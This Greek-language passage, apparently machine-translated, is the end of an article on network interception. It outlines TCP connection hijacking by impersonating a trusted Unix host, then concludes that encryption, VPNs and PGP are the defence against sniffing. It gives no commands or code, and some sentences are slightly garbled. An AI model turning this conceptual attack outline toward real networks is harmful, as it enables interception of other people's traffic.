Η πρώτη εργασία επιλύεται με εις βάθος μελέτες της εφαρμογής του πρωτοκόλλου TCP σε διάφορα λειτουργικά συστήματακαι είναι πλέον καθαρά θεωρητικό. Το δεύτερο πρόβλημα επιλύεται χρησιμοποιώντας τρωτά σημεία Συστήματα Unixμε τον εντοπισμό αξιόπιστων κεντρικών υπολογιστών. (Ένας αξιόπιστος κεντρικός υπολογιστής Α είναι ένας κεντρικός υπολογιστής δικτύου Β του οποίου ο χρήστης μπορεί να συνδεθεί στον κεντρικό υπολογιστή Α χωρίς έλεγχο ταυτότητας χρησιμοποιώντας την υπηρεσία r του κεντρικού υπολογιστή Α). Με το χειρισμό των παραμέτρων των πακέτων TCP, ένας χάκερ μπορεί να προσπαθήσει να μιμηθεί έναν αξιόπιστο κεντρικό υπολογιστή και να υποκλέψει μια σύνδεση TCP με τον κεντρικό υπολογιστή που δέχεται επίθεση.

Όλα αυτά είναι πολύ ενδιαφέροντα, αλλά τα πρακτικά αποτελέσματα αυτού του είδους της έρευνας δεν είναι ακόμη ορατά. Επομένως, συμβουλεύουμε όλους όσους θέλουν να εμβαθύνουν σε αυτό το θέμα να ανατρέξουν στο βιβλίο, από όπου, γενικά, αντλήθηκαν οι παραπάνω πληροφορίες.

συμπέρασμα

Η δικτυακή υποκλοπή είναι η πιο αποτελεσματική τεχνική παραβίασης δικτύου, που επιτρέπει σε έναν χάκερ να αποκτήσει σχεδόν όλες τις πληροφορίες που κυκλοφορούν σε ένα δίκτυο. Τα εργαλεία sniffing έχουν λάβει τη μεγαλύτερη πρακτική ανάπτυξη, δηλ. Ακούγοντας δίκτυα. Ωστόσο, οι τεχνικές υποκλοπής δικτύου που εκτελούνται παρεμβαίνοντας στην κανονική λειτουργία του δικτύου με σκοπό την ανακατεύθυνση της κυκλοφορίας σε έναν κεντρικό υπολογιστή χάκερ δεν μπορούν να αγνοηθούν, ειδικά οι τεχνικές υποκλοπής σύνδεσης TCP. Ωστόσο, στην πράξη, οι μέθοδοι που αναφέρθηκαν τελευταία δεν έχουν ακόμη αναπτυχθεί επαρκώς και πρέπει να βελτιωθούν.

Ένας anti-hacker θα πρέπει να γνωρίζει ότι ο μόνος τρόπος για να αποτρέψει την υποκλοπή δεδομένων είναι να τα κρυπτογραφήσει, δηλ. κρυπτογραφικές μεθόδους προστασίας. Κατά την αποστολή μηνύματος μέσω του δικτύου, θα πρέπει εκ των προτέρων να υποτεθεί ότι το καλωδιακό σύστημα του δικτύου είναι απολύτως ευάλωτο και οποιοσδήποτε χάκερ που συνδέεται στο δίκτυο θα μπορεί να συλλάβει όλα τα μυστικά μηνύματα που μεταδίδονται από αυτό. Υπάρχουν δύο τεχνολογίες για την επίλυση αυτού του προβλήματος - η δημιουργία ενός δικτύου VPN και η κρυπτογράφηση των ίδιων των μηνυμάτων. Όλες αυτές οι εργασίες επιλύονται πολύ εύκολα χρησιμοποιώντας το πακέτο λογισμικού PGP Desktop Security (η περιγραφή του βρίσκεται, για παράδειγμα, στο).

Δημοφιλή στην κατηγορία: